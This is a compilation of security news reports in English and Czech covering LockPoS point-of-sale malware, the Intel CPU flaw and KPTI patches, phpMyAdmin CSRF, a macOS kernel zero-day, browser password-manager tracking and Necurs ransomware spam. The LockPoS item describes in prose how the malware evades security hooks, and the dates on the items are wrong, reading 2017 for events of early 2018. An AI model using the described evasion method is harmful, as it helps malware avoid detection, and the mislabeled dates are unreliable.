First detailed in July this year, LockPoS steals credit card data from the memory of computers attached to PoS credit card scanners. The malware was designed to read the memory of running processes and collect credit card data that is then sent to its command and control (C&C) server.

Previous analysis revealed that the threat used a dropper that injects it directly into the explorer.exe process. After execution, the dropper extracts a resource file from itself and injects various components that load the final LockPoS payload.

The malware is now employing an injection method that appears to be a new variant of a technique previously employed by the Flokibot PoS malware. With LockPoS distributed from the Flokibot botnet, and with the two threats sharing similarities, this doesn’t come as a surprise.

One of the injection techniques employed by LockPoS involves creating a section object in the kernel, calling a function to map a view of that section into another process, then copying code into the section and creating a remote thread to execute the mapped code, Cyberbit says.

LockPoS was observed using 3 main routines to inject code into a remote process, namely NtCreateSection, NtMapViewOfSection, and NtCreateThreadEx, all three exported from ntdll.dll, a core Dynamic-link library (DLL) file in the Windows operating system.

Instead of calling said routines, the malware maps ntdll.dll from the disk to its own virtual address space, which allows it to maintain a “clean” copy of the DLL file. LockPoS also allocates a buffer for saving the system calls number, copies malicious code to the shared mapped section, then creates a remote thread in explorer.exe to execute its malicious code.

By using this “silent” malware injection method, the malware can avoid any hooks that anti-malware software might have installed on ntdll.dll, thus increasing the chances of a successful attack.

“This new malware injection technique suggests a new trend could be developing of using old sequences in a new way that makes detection difficult,” Hod Gavriel, malware analyst at Cyberbit, explains.

While most endpoint detection and response (EDR) and next-gen antivirus products already monitor the Windows functions in user mode, kernel functions can’t be monitored in Windows 10, where the kernel space is still guarded. To ensure successful detection, improved memory analysis should be employed, the researcher says.


Intel má velký problém s procesory, oprava kritické chyby povede k jejich zpomalení
3.1.2017 Živě.cz
Hardware
Intelu hrozí velký průšvih, obsahují kritickou chybu na hardwarové úrovni
Umožňuje přístup k paměťovému prostoru pro jádro systému
Softwarový oprava bude znamenat snížení výkonu
Na herní výkon nemá zavedení KPTI vliv. Takto vypadá před a po jeho aktivaci v CS:GO.A takto v F1 2012.Při dalších operacích může dojít ke snížení výkonu při práci s archivy.Pokles byl zaznamenán i při práci s SSD. Takto vypadaly rychlosti před aktualizací……a takto po ní. Není ale jasné, zda rozdíl opravdu souvisí s KPTI.
O zpomalování procesorů se v posledních týdnech hovoří především v souvislosti s Applem a jeho iPhony. Jenže nyní to vypadá, že tahle minikauza bude brzy zapomenuta, mnohem větší průšvih totiž může postihnout Intel a většinu z jeho procesorů několika posledních generací. Za vše může chyba při práci s paměťovým systémem.

Nejdřív zkrácená verze pro ty, které nemají zájem o technické pozadí. Web The Register přinesl informace o chybě na hardwarové úrovni, která způsobuje, že se zpracovávaný kód může dostat do adresního prostoru, který je vyhrazen čistě pro jádro systému. Nyní jsou oba prostory, jak uživatelský tak pro kernel mapovány společně a přístup k nim je řízen pomocí privilegií.

Díky tomu je zrychlena práce s pamětí při přepínání mezi operacemi na uživatelské a systémové úrovni. Oprava chyby ale bude vyžadovat jejich oddělení v jádře systému, což sníží celkový výkon. U operací, které se týkají především serverového použití to může být pokles až o třetinu výkonu.

Vzhledem k tomu, že je většina informací pod embargem a zveřejněné opravě v linuxovém jádře chybí jakákoliv dokumentace, nemáme podrobné informace o samotné chybě v procesorech a stejně tak nevíme, zda se nebude týkat i AMD. Podle dosavadních indicií by se však mělo jednat pouze o procesory Intelu. Konkrétně se hovoří o modelech Core 6., 7. a 8. generace, procesorech Xeon v5 a v6, Xeonech-W a nižších řadách Apollo Lake (Atom, Pentium).

Linux, Windows i macOS
The Register vycházel primárně z reportu na LWM.net, který informuje o zavedení KPTI (kernel page-table isolation) do jádra Linuxu na konci října. Jde právě o izolaci obou adresních prostorů pro práci se systémovým a uživatelským kódem.

Aktuálně jsou oba v paměti namapovány společně a asociativní buffer TLB tak může uchovávat informace o přiřazení virtuální paměti k fyzické adrese pro oba prostory. Pokud se tedy vykonává uživatelský kód, CPU má v TLB ihned k dispozici adresování na fyzickou paměť a stejně tak když přijde na řadu kód na úrovni systémového jádra.

Jenže hardwarová chyba v procesorech vyžaduje opravu zavedením již zmíněné izolace. V takovém případě je třeba buffer TLB vyprázdnit při každé změně paměťového prostoru. Pokud CPU pracuje s programem, je v TLB uloženo adresování uživatelské části paměti, jestliže ale začne pracovat třeba s diskem, což si vyžádá volání na systémové úrovni, bude potřeba TLB vyprázdnit.

Izolace adresních prostorů bude zavedena do všech systémů. V Linuxu již je a do jádra Windows se dostane velmi brzy. V případě, že využíváte testovací program Insider Preview, pak je již dostupná v aktualizaci s označením 17063. Stejně tak se oprava zamíří do macOS.

Až o 30 % nižší výkon
Na webu se začaly objevovat první testy, které demonstrují dopad zavedení KPTI při konkrétním využití. Pro běžné koncové uživatele se toho příliš nezmění – testy na webu Phoronix ukazují, že i s opatchovaným systémem je výkon ve hrách totožný.

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek
Na herní výkon nemá zavedení KPTI vliv (zdroj: Phoronix)
Na Computerbase potom otestovali procesor Core i7-7700K při běžných scénářích, které vídáme v obvyklých srovnávacích testech. Výraznější rozdíl byl zaznamenán pouze při práci s archivy. Stále však jde o nízké jednotky procent.

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek
Testy Core i7-7700K před a po aktualizaci na verzi 17063 s aktivní KPTI. Nepatrný rozdíl je pouze při práci s archivy (zdroj: Computerbase)
Zároveň si na Computebase všimli většího rozdílu při práci s SSD, kdy s novou aktualizací klesnuly přenosové rychlosti o několik desítek MB/s. Tady ale není možné určit, zda za propad opravdu může zavedení KPTI nebo jiná změna v systému.

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zekKlepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek
Takto se liší přenosové rychlosti úložiště SSD po instalaci aktualizace (zdroj: Computerbase)
Problém značných rozměrů by ale mohl nastat v případě serverového použití a to především na straně obřích poskytovatelů jako je Microsoft, Google nebo Amazon. Právě při práci s databázemi nebo virtualizaci jsou zaznamenávány nejvyšší propady ve výkonu.

Jeden ze značně znepokojujících reportů vydali vývojáři databázového systému PostgreSQL. Ti otestovali běh databáze na procesoru Intel Core i7-6820HQ. Při aktivní izolaci adresního prostoru byl výkon nižší v nejlepším případě o 17 procent. Při nejhorším scénáři potom došlo k propadu výkonu dokonce o 23 procent. Pokud se takové výsledky potvrdí po nasazení do reálného provozu, pro většinu poskytovatelů cloudových služeb to bude znamenat velké problémy. A to nejen technické, mohou si vyžádat značné investice do hardwaru.

Velké záplatování
Že se nejedná o výstřel do prázdna, je patrné nejen z dosavadního embarga prakticky na jakékoliv informace, ale i z reakce velkých poskytovatelů. Amazon rozeslal zákazníkům využívající virtualizační služby EC2 e-mail o tom, že v noci z pátku na sobotu bude probíhat údržba, na kterou si vyhradil čtyrhodinové okno, během něhož dojde k restartování služeb a virtuální instance nebudou dostupné.

Podobný zásah potom čeká i uživatele služeb Microsoft Azure. V tomto případě bude patchování a restartování strojů probíhat od půlnoci 10. ledna.

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zekKlepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek
Amazon na chvíli vypne svoje virtualizační služby ještě tento týden, u Microsftu bude údržba probíhat příští středu
Tady je potřeba zdůraznit, že údržba tohoto rozsahu je naprosto výjimečná. Jen v ojedinělých případech je potřeba restartování, které způsobí nedostupnost cloudových služeb, tady virtualizačních.

Výhra pro AMD. Snad…
Na zprávy o problémech celkem logicky muselo zareagovat AMD a prvním výstupem se stal publikovaný komentář jednoho z linuxových vývojářů z AMD. Podle něj žádný z procesorů společnosti touto chybou netrpí a KPTI tak není potřeba zavádět.

Je tedy pravděpodobné, že na procesory AMD se nebude opatření v podobě izolace adresních prostorů vztahovat. Pokud by totiž vývojáři systému tuto výjimku v kernelu nezavedli, na AMD by KTPI dopadlo mnohem výrazněji než na samotný Intel. To ukazuje test na webu Grsecurity, kde serverový procesor Epyc po aktivaci KTPI přišel o 51 procent výkonu.

Klepn%C4%9Bte%20pro%20v%C4%9Bt%C5%A1%C3%AD%20obr%C3%A1zek
Nahoře výkon procesoru Epyc bez KPTI, dole po jeho aktivaci. Rozdíl až 51 % (zdroj: Grsecurity)
Žádného oficiálního vyjádření od Intelu jsme se zatím nedočkali, jistě však bude muset přijít. A to i kvůli investorům. Cena akcií AMD rychle vyskočila o 5 %, naopak u Intelu můžeme sledovat opačný trend. S úsměvem rovněž můžeme číst zprávu z před dvou týdnů o tom, že se CEO Intelu Brian Krzanich zbavil všech akcií, které mohl prodat. Utržil za ně 11 milionů dolarů a ponechal si pouze minimum, které musí na své pozici držet. Vypadá to na zajímavý start roku 2018.


VMware Patches Critical Flaws in vSphere Data Protection
3.1.2017 securityweek
Vulnerebility
VMware has patched three critical vulnerabilities in vSphere Data Protection (VDP), including arbitrary file upload, authentication bypass and path traversal issues.

vSphere Data Protection is a backup and recovery solution for vSphere environments. The product is no longer offered by VMware since April 2017, but the company will continue to provide general support for version 6.x until 2020 and technical guidance until 2022.

VMware published a security advisory on Tuesday to inform VDP customers that critical vulnerabilities have been found in versions 5.x, 6.0.x and 6.1.x of the product. VMware has not credited anyone for discovering the weaknesses.

One of the flaws, tracked as CVE-2017-15548, allows an unauthenticated attacker to remotely bypass authentication and gain root access to a vulnerable system. Another bug, identified as CVE-2017-15549, allows a remote attacker with access to a low-privileged account to upload malicious files to any location on the server file system.

The last vulnerability is a path traversal tracked as CVE-2017-15550. It allows an authenticated attacker with low privileges to access arbitrary files on the server in the context of the vulnerable application.

The security holes have been patched with the release of VDP 6.1.6 and 6.0.7. Users of version 5.x have been advised to update to version 6.0.7 or newer.

This is only the third security advisory published by VMware for VDP. Another advisory was released last year to alert users of critical Java deserialization and credentials encryption issues, and one was published in late 2016 for an SSH key-based authentication flaw.


Mitigations Prepared for Critical Vulnerability in Intel CPUs
3.1.2017 securityweek
Vulnerebility
Researchers have apparently discovered a serious vulnerability affecting all Intel CPUs. Software-level mitigations have already been developed, but they could cause significant performance penalties.

Details of the vulnerability are expected to become available on January 9. The impact of the flaw is comparable to the notorious Heartbleed bug, but an attack is said to be more practical.

The existence of the security hole came to light following the introduction of kernel page table isolation (KPTI) in Linux. A similar feature is being implemented by Microsoft in Windows and Apple is also expected to make some changes in macOS. Experts believe it will not be easy for Intel to address the problem directly in its processors.

Vulnerability Impacts Intel ChipsKPTI is a hardening technique designed to improve security by isolating the kernel space from user space memory. It’s based on the KAISER system developed last year by a team of researchers at the Graz University of Technology in Austria. KAISER brings improvements to address space layout randomization (ASLR), a mitigation designed to prevent control-flow hijacking and code injection attacks.

Back in July 2017, researcher Anders Fogh shared some thoughts on how it may be possible to read kernel memory from an unprivileged process via speculative execution. While his attempts were unsuccessful, his work did yield some results. Some believe that researchers at Graz University – Fogh has previously collaborated with Graz University researchers on memory-related attacks – may have found a way to make it work.

Gaining access to the kernel space poses serious risks as this memory can include highly sensitive information.

AMD says its processors are not vulnerable to the type of attacks mitigated by KPTI, but the company does mention speculative execution.

“The AMD microarchitecture does not allow memory references, including speculative references, that access higher privileged data when running in a lesser privileged mode when that access would result in a page fault,” an AMD representative explained.

Cloud services from Microsoft, Amazon and Google are apparently impacted by the Intel hardware vulnerability - Amazon Web Services (AWS) and Microsoft Azure have informed customers of upcoming security updates that will require a reboot of their cloud instances. A developer who writes on the blog Python Sweetness speculated that the flaw could allow privilege escalation attacks against hypervisors.

As for the impact of the KPTI mitigation on performance, tests conducted by Grsecurity showed an impact of up to 35%, but it depends a great deal on what type of operations are being carried out. Tests done by Phoronix showed that gaming performance on Linux does not appear to be affected by the PTI changes in the kernel.

“Performance penalties from single to double digits are expected on patched kernels,” explained Michael Larabel, founder of Phoronix. “The penalty depends upon how much interaction the application/workload deals with the kernel if there's a lot of context switching and other activity. If it's a simple user-space application not doing much, the x86 PTI additions shouldn't cause much of an impact. Newer Intel CPUs with PCID should also help in ensuring less of a performance impact.”

The developers of the KAISER system claimed that the method has a negative impact of only 0.28%.


Intel Makes a Mistake in The CPU Design, Windows and Linux Scramble to Fix It
3.1.2017 securityaffairs
Vulnerebility

Intel Makes a Mistake in The CPU Design, Windows and Linux Scramble to Fix It. It is suspected that the flaw is in the way an Intel CPU manages memory between “kernel mode” and “user mode.”
Competition between IT hardware manufacturers is fierce. Decimal point differences in performance specs translate into millions of dollars won or lost with every chip release. Manufacturers are very creative at finding ways to gain an edge over their competition, and sometimes the creativity works against them. This appears to be the case with Intel’s CPUs, and in the worst case, it affects anyone who relies on Intel chips for virtualization — most companies, and cloud providers like Microsoft Azure, Amazon EC2, Google Compute Engine. It is up to operating system manufacturers to fix the problem and the fix will hurt performance.

Details of the security vulnerability are under embargo from Intel in an attempt to give developers time to come up with a fix so much of the reporting on the bug is extrapolated from online discussions and by dissecting the Linux patches that were quickly rolled out in December.

It is suspected that the flaw is in the way an Intel CPU manages memory between “kernel mode” and “user mode.” Think of all the programs running on a computer at the same time. For security and stability reasons we want to be sure that one program doesn’t negatively impact another program. For example, if your browser crashes you don’t want it to take down the entire computer by crashing the OS.

In a virtualized cloud environment, you don’t want someone else’s program to be able to see the details of what you are running in your portion of the cloud. To accomplish this isolation, individual programs are run in their own “user space.” However, these programs are still sharing hardware like network connections and hard drives so there is another layer required. Kernel mode coordinates requests for shared hardware and still maintain isolation between the various user mode programs. When microseconds can impact your performance metrics, the “cost” of loading kernel mode to execute the request, then unloading kernel mode, and returning to user mode is “expensive.” As described in The Register article, Intel attempted a shortcut “To make the transition from user mode to kernel mode and back to user mode as fast and efficient as possible, the kernel is present in all processes’ virtual memory address spaces, although it is invisible to these programs. When the kernel is needed, the program makes a system call, the processor switches to kernel mode and enters the kernel. When it is done, the CPU is told to switch back to user mode, and re-enter the process.”

intel%20chip

Although memory for each user process is well isolated, it is believed that the Intel flaw allows for these user processes to exploit kernel memory space to violate the intended isolation.

Many operating systems utilize a security control called Kernel Address Space Layout Randomization (KASLR) which is supposed to address risks of a user process gaining access to kernel memory space (Daniel López Azaña has a good summary of ASLR, KASLR and KARL here.) However, in October 2017 the Linux core kernel developers released the KAISER patch series which hinted at the current Intel CPU issue, detailed in the LWN article, “KAISER: hiding the kernel from user space.” Then in December, a number of Linux distributions released kernel updates which included Kernel Page-Table Isolation (PTI) significantly restricting memory space available to running processes. On December 26, 2017, Intel’s competitor AMD sent this email to the Linux kernel mailing list:

"AMD processors are not subject to the types of attacks that the kernel
page table isolation feature protects against. The AMD microarchitecture
does not allow memory references, including speculative references, that
access higher privileged data when running in a lesser privileged mode
when that access would result in a page fault."
All of this activity seems to point squarely at a problem in the way that Intel CPUs isolate, or fail to isolate, kernel memory from user processes. But while under the embargo it is all educated guessing.

Major Linux distributions have released kernel updates to address the issue and Microsoft is expected to release corresponding patches in January’s patch bundle. There are rumors that Microsoft Azure and Amazon Web Services customers have been notified directly of impending maintenance outages this month which might be associated with patches for this Intel bug. Since the kernel mode shortcut was intended to improve CPU performance, you should expect that the fix will negatively impact current performance. We will have to wait for the Intel information embargo to be lifted, and for the Linux and Windows patches to be applied to truly understand the risks and performance impacts.


Marketing companies have started exploiting a flaw in browsers’ built-in password managers to track users
3.1.2017 securityaffairs
Vulnerebility

A group of researchers discovered marketing companies have started exploiting an 11-year-old vulnerability in browsers’ built-in password managers to track visitors.
A group of researchers from Princeton’s Center for Information Technology Policy has discovered that at least two marketing companies, AdThink and OnAudience, that are exploiting an 11-year-old vulnerability in major browsers to track visitors.

The researchers discovered that the marketing firms have started exploiting the flaw in browsers’ built-in password managers that allow them to secretly steal email address. The gathered data allow them to target advertising across different browsers and devices.

password-manager%20tracking

Of course, the same flaw could be exploited by threat actors to steal saved login credential from browsers without requiring users interaction.
Every browser (i.e. Google Chrome, Mozilla Firefox, Microsoft Edge, and Opera) implements a built-in password manager tool that allows users to save login information for automatic form-filling.

The researchers from Princeton’s Center for Information Technology Policy discovered that both AdThink and OnAudience are exploiting the built-in password managers to track visitors of around 1,110 of the Alexa top 1 million sites across the Internet.

“We found two scripts using this technique to extract email addresses from login managers on the websites which embed them. These addresses are then hashed and sent to one or more third-party servers. These scripts were present on 1110 of the Alexa top 1 million sites.” states the analysis of the Princeton’s Center for Information Technology Policy.

The experts have found third-party tracking scripts on these websites that inject invisible login forms in the background of the webpage, the password managers are tricked into auto-filling the form using these data.

The scripts detect the username and send it to third-party servers after hashing with MD5, SHA1, and SHA256 algorithms, these hashed values are used as an identifier for a specific user. Typically tracker used the hashed email as user’s ID.

“Login form autofilling in general doesn’t require user interaction; all of the major browsers will autofill the username (often an email address) immediately, regardless of the visibility of the form.” continue the researchers.

“Chrome doesn’t autofill the password field until the user clicks or touches anywhere on the page. Other browsers we tested don’t require user interaction to autofill password fields.”

browser%20password-manager%20tracking

“Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier,” the researchers said. “A user’s email address will almost never change—clearing cookies, using private browsing mode, or switching devices won’t prevent tracking.”
Third-party password managers like LastPass and 1Password are not exposed to this tracking technique because they avoid auto-filling invisible forms and anyway they require user interaction.

Users can test the tracking technique using a live demo page created by the researchers.

Below the list of sites embedding scripts that abuse login manager for tracking, it also includes the website of the founder of M5S Beppe Grillo (beppegrillo.it).


Obří bezpečnostní chyba v procesorech Intel zpomalí stovky milionů počítačů až o třetinu. Problém se týká všech operačních systémů

3.1.2017 Ihned.cz Zranitelnosti

Chyba je přímo v procesorech vyrobených firmou Intel, takže není důležité, s jakým operačním systémem uživatel pracuje.

Chyba v návrhu procesorů Intel umožňuje útočníkům přečíst obsah paměti a zefektivnit útoky.
Problém se týká procesorů od Intelu vyrobených v posledních deseti letech a tím pádem i stovek milionů PC.
Výrobci operačních systémů musí problém odstranit softwarově s výrazným vlivem na výkon.
Intel udělal při návrhu svých procesorů zásadní chybu, která zpomalí chod stovek milionů počítačů s operačním systémem Windows a Linux. Vývojáři pracující na jádru Linuxu se snaží bezpečnostní díru opravit, od Microsoftu se očekává, že aktualizaci vydá v nejbližších dnech, testují ji už uživatelé v programu Windows Insider.

Chyba se dotkne i systému MacOS od Applu, protože není závislá na operačním systému, ale je přímo v procesorech Intel. Totéž se týká velkých cloudových služeb, které mají servery vybavené čipy od Intelu. Bez starostí mohou být naopak uživatelé procesorů AMD, které touto chybou netrpí. Intel ale ovládá 80 procent trhu s počítačovými procesory, a dokonce 90 procent u notebooků a serverů.

V souvislosti s opravou bezpečnostní chyby, která útočníkům umožňuje přístup k chráněné části paměti počítačů, dojde ke snížení výkonu postižených počítačů. Rozdíl ve výkonu se podle předběžných informací může pohybovat od pěti až do třiceti procent podle typu vykonávané úlohy a konkrétního modelu procesoru. Například u databázového produktu PostgreSQL jde v nejlepších případech o zpomalení o 17 procent, v nejhorším o 23 procent.

Konkrétní informace o chybě v procesorech Intel nejsou zatím k dispozici. K jejich zveřejnění dojde podle informací serveru The Register po vydání aktualizace pro Windows. Opravy pro jádro Linuxu jsou už k dispozici, informace o změnách jsou ale utajené. Problém se však týká možnosti aplikací získat přístup k chráněné oblasti operační paměti používané jádrem operačního systému. Toto bezpečnostní riziko lze odstranit softwarovým oddělením uživatelské a systémové paměti.


Necurs botnet involved in massive ransomware campaigns at the end of 2017
3.1.2017 securityaffairs
Ransomware

The Necurs botnet made the headlines at year-end sending out tens of millions of spam emails daily as part of massive ransomware campaigns.
Necurs was not active for a long period at the beginning of 2017 and resumed it activity in April.

The Necurs botnet was used in the past months to push many other malware, including Locky, Jaff, GlobeImposter, Dridex , Scarab and the Trickbot.

According to data collected by the experts at AppRiver, between December 19 and December 29, 2017, the Necurs botnet was involved in the distribution of ransomware. Crooks use typical holiday-themed scam emails to distribute both Locky and GlobeImposter, malicious messages used .vbs (Visual Basic Script) or .js (JavaScript) files inside a .7z archive.

necurs%20botnet%20xmas%201220_js_eml

Starting on Dec. 19, the Necurs botnet was observed sending tens of millions of spam emails daily to distribute ransomware, the peak was reached on December 20th with over 47 million email (peaking at 5.7 million per hour).

“On Dec. 19, AppRiver’s filters stopped 45,976,814 malicious emails sent by the Necurs botnet. Maximum traffic for it was a just more than 4.6 million emails per hour. These were all .7z that contained malicious .vbs files leading to an infection.” reads the analysis published by AppRiver.

Necurs%20botnet%20xmas

Experts noticed that during the first day operators only used vbs files inside the .7z archive, while the second day they started using also .js files.

“On Dec. 21 and 22, the traffic switched back over to the .js files and began to taper off. We saw 36,290,981 and 29,602,971 messages blocked respectively, for those two days, before the botnet went quiet from Dec. 23-25. Today (Dec. 26), Necurs re-awoke from its slumber for a couple hours then went quiet again.” continues the analysis.

“Hard to say why, however, I would hypothesize the operators may have been testing or monitoring the rate of infections and realized many workers are on vacation. As of the time this blog was authored we’ve captured the below statistics for today”

The activity of the botnet increased again on Dec. 28-29, on the first day it peaked 6.5 million messages early morning, on the next day, the Necurs botnet sent out nearly 59 million ransomware messages.


Critical Flaw Reported In phpMyAdmin Lets Attackers Damage Databases
3.1.2017 thehackernews 
Vulnerebility
A critical security vulnerability has been reported in phpMyAdmin—one of the most popular applications for managing the MySQL database—which could allow remote attackers to perform dangerous database operations just by tricking administrators into clicking a link.
Discovered by an Indian security researcher, Ashutosh Barot, the vulnerability is a cross-site request forgery (CSRF) attack and affects phpMyAdmin versions 4.7.x (prior to 4.7.7).
Cross-site request forgery vulnerability, also known as XSRF, is an attack wherein an attacker tricks an authenticated user into executing an unwanted action.
According to an advisory released by phpMyAdmin, "by deceiving a user to click on a crafted URL, it is possible to perform harmful database operations such as deleting records, dropping/truncating tables, etc."
phpMyAdmin is a free and open source administration tool for MySQL and MariaDB and is widely used to manage the database for websites created with WordPress, Joomla, and many other content management platforms.
Moreover, a lot of hosting providers use phpMyAdmin to offer their customers a convenient way to organize their databases.

Barot has also released a video, as shown above, demonstrating how a remote attacker can make database admins unknowingly delete (DROP) an entire table from the database just by tricking them into clicking a specially crafted link.
"A feature of phpMyAdmin was using a GET request and after that POST request for Database operations such as DROP TABLE table_name; GET requests must be protected against CSRF attacks. In this case, POST requests were used which were sent through URL (for bookmarking purpose may be); it was possible for an attacker to trick a database admin into clicking a button and perform a drop table database query of the attacker’s choice." Barot explains in a blog post.
However, performing this attack is not simple as it may sound. To prepare a CSRF attack URL, the attacker should be aware of the name of targeted database and table.
"If a user executes a query on the database by clicking insert, DROP, etc. buttons, the URL will contain database name and table name," Barot says. "This vulnerability can result in the disclosure of sensitive information as the URL is stored at various places such as browser history, SIEM logs, Firewall Logs, ISP Logs, etc."
Barot reported the vulnerability to phpMyAdmin developers, who confirmed his finding and released phpMyAdmin 4.7.7 to address this issue. So administrators are highly recommended to update their installations as soon as possible.


15-Year-Old Apple macOS 0-Day Kernel Flaw Disclosed, Allows Root Access
3.1.2017 thehackernews  Apple

A security researcher on New Year's eve made public the details of an unpatched security vulnerability in Apple's macOS operating system that can be exploited to take complete control of a system.
On the first day of 2018, a researcher using the online moniker Siguza released the details of the unpatched zero-day macOS vulnerability, which he suggests is at least 15 years old, and proof-of-concept (PoC) exploit code on GitHub.
The bug is a serious local privilege escalation (LPE) vulnerability that could enable an unprivileged user (attacker) to gain root access on the targeted system and execute malicious code. Malware designed to exploit this flaw could fully install itself deep within the system.
From looking at the source, Siguza believes this vulnerability has been around since at least 2002, but some clues suggest the flaw could actually be ten years older than that. "One tiny, ugly bug. Fifteen years. Full system compromise," he wrote.
This local privilege escalation flaw resides in IOHIDFamily, an extension of the macOS kernel which has been designed for human interface devices (HID), like a touchscreen or buttons, allowing an attacker to install a root shell or execute arbitrary code on the system.
"IOHIDFamily has been notorious in the past for the many race conditions it contained, which ultimately lead to large parts of it being rewritten to make use of command gates, as well as large parts being locked down by means of entitlements," the researcher explains.
"I was originally looking through its source in the hope of finding a low-hanging fruit that would let me compromise an iOS kernel, but what I didn’t know it then is that some parts of IOHIDFamily exist only on macOS - specifically IOHIDSystem, which contains the vulnerability."
The exploit created by Siguza, which he dubbed IOHIDeous, affects all versions of macOS and enables arbitrary read/write bug in the kernel.
Besides this, IOHIDeous also disables the System Integrity Protection (SIP) and Apple Mobile File Integrity (AMFI) security features that offer protection against malware.
The PoC code made available by Siguza has for some reason stopped working on macOS High Sierra 10.13.2 and works on macOS High Sierra 10.13.1 and earlier, but he believes the exploit code can be tweaked to work on the latest version as well.
However, the researcher pointed out that for his exploit to work, it needs to force a log out of the logged-in user, but this can be done by making the exploit work when the targeted machine is manually shut down or rebooted.
Since the vulnerability only affects macOS and is not remotely exploitable, the researcher decided to dumped his findings online instead of reporting it to Apple. For those unaware, Apple's bug bounty program does not cover macOS bugs.
For in-depth technical details about the vulnerability, you can head on to researcher's write-up on GitHub.


Flaw In Major Browsers Allows 3rd-Party Scripts to Steal Your Saved Passwords
3.1.2017 thehackernews 
Vulnerebility

Security researchers have uncovered how marketing companies have started exploiting an 11-year-old bug in browsers' built-in password managers, which allow them to secretly steal your email address for targeted advertising across different browsers and devices.
The major concern is that the same loophole could allow malicious actors to steal your saved usernames and passwords from browsers without requiring your interaction.
Every modern browser—Google Chrome, Mozilla Firefox, Opera or Microsoft Edge—today comes with a built-in easy-to-use password manager tool that allows you to save your login information for automatic form-filling.
These browser-based password managers are designed for convenience, as they automatically detect login form on a webpage and fill-in the saved credentials accordingly.
However, a team of researchers from Princeton's Center for Information Technology Policy has discovered that at least two marketing companies, AdThink and OnAudience, are actively exploiting such built-in password managers to track visitors of around 1,110 of the Alexa top 1 million sites across the Internet.
Third-party tracking scripts found by researchers on these websites inject invisible login forms in the background of the webpage, tricking browser-based password managers into auto-filling the form using the saved user's information.
"Login form auto filling in general doesn't require user interaction; all of the major browsers will autofill the username (often an email address) immediately, regardless of the visibility of the form," the researchers say.
"Chrome doesn't autofill the password field until the user clicks or touches anywhere on the page. Other browsers we tested don't require user interaction to autofill password fields."

Since these scripts are primarily designed for user-tracking, they detect the username and send it to third-party servers after hashing with MD5, SHA1 and SHA256 algorithms, which could then be used as a persistent ID for a specific user to track him/her from page to page.
"Email addresses are unique and persistent, and thus the hash of an email address is an excellent tracking identifier," the researchers said. "A user's email address will almost never change—clearing cookies, using private browsing mode, or switching devices won't prevent tracking."
Although the researchers have spotted marketing firms scooping up your usernames using such tracking scripts, there is no technical measure to prevent these scripts from collecting your passwords the same way.
However, most third-party password managers, like LastPass and 1Password, are not prone to this attack, since they avoid auto-filling invisible forms and require user interaction as well.
Researchers have also created a demo page, where you can test if your browser's password manager also leaks your username and password to invisible forms.
The simplest way to prevent such attacks is to disable the autofill function on your browser.


Many GPS Tracking Services Expose User Location, Other Data
3.1.2017 securityweek Privacy
Researchers discovered that many online services designed for managing location tracking devices are affected by vulnerabilities that expose potentially sensitive information.

Fitness, child, pet and vehicle trackers, and other devices that include GPS and GSM tracking capabilities are typically managed via specialized online services.

Security experts Vangelis Stykas and Michael Gruhn found that over 100 such services have flaws that can be exploited by malicious actors to gain access to device and personal data. The security holes, dubbed Trackmageddon, can expose information such as current location, location history, device model and type, serial number, and phone number.

Some services used by devices that have photo and audio recording capabilities also expose images and audio files. In some cases, it’s also possible to send commands to devices in order to activate or deactivate certain features, such as geofence alerts.

Attackers can gain access to information by exploiting default credentials (e.g. 123456), and insecure direct object reference (IDOR) flaws, which allow an authenticated user to access other users’ accounts simply by changing the value of a parameter in the URL. The services also expose information through directory listings, log files, source code, WSDL files, and publicly exposed API endpoints that allow unauthenticated access.

Stykas and Gruhn have notified a vast majority of the affected vendors in November and December. Nine services have confirmed patching the flaws or promised to implement fixes soon, and over a dozen websites appear to have addressed the vulnerabilities without informing the researchers. However, the rest of the tracking services remain vulnerable.

There are roughly 100 impacted domains, but some of them appear to be operated by the same company. Researchers have identified 36 unique IPs hosting these domains and 41 databases that they share. They estimate that these services expose data associated with over 6.3 million devices and more than 360 device models.

The vulnerable software appears to come from China-based ThinkRace, but in many cases the company does not have control over the servers hosting the tracking services.

Gruhn and Stykas pointed out that vulnerabilities in ThinkRace products – possibly including some of the issues disclosed now – were first discovered in 2015 by a New Zealand-based expert while analyzing car tracking and immobilisation devices that relied on ThinkRace software.

Users of the online tracking services that remain vulnerable have been advised to change their password and remove any potentially sensitive information stored in their account. However, these are only partial solutions to the problem and researchers have advised people to simply stop using affected devices until patches are rolled out.


Critical Vulnerability Patched in phpMyAdmin
3.1.2017 securityweek
Vulnerebility
An update released just before the holidays by the developers of phpMyAdmin patches a serious vulnerability that can be exploited to perform harmful database operations by getting targeted administrators to click on specially crafted links.

phpMyAdmin is a free and open source tool designed for managing MySQL databases over the Internet. With more than 200,000 downloads every month, phpMyAdmin is one of the top MySQL database administration tools.

India-based researcher Ashutosh Barot discovered that phpMyAdmin is affected by a cross-site request forgery (CSRF) flaw that can be exploited by an attacker to drop tables, delete records, and perform other database operations.

For the attack to work, an authenticated admin needs to click on a specially crafted URL. However, Barot noted that the attack works as long as the user is logged in to the cPanel web hosting administration interface, even if phpMyAdmin has been closed after use.

These types of attacks are possible due to the fact that vulnerable versions of phpMyAdmin use GET requests for database operations, but fail to provide CSRF protection.

The researcher also discovered that the URLs associated with database operations performed via phpMyAdmin are stored in the web browser history, which can pose security risks.

“The URL will contain database name and table name as a GET request was used to perform DB operations,” Barot said in a blog post published on Friday. “URLs are stored at various places such as browser history, SIEM logs, firewall logs, ISP logs, etc. This URL is always visible at client side, it can be a serious issue if you are not using SSL (some information about your previous queries were stored in someone’s logs!). Wherever the URL is being saved, an adversary can gain some information about your database.”

phpMyAdmin developers fixed the CSRF vulnerability found by Barot with the release of version 4.7.7. All prior 4.7.x versions are impacted by the security hole, which phpMyAdmin has classified as “critical.” Users have been advised to update their installations or apply the available patch.


Necurs Botnet Fuels Massive Year-End Ransomware Attacks
3.1.2017 securityweek
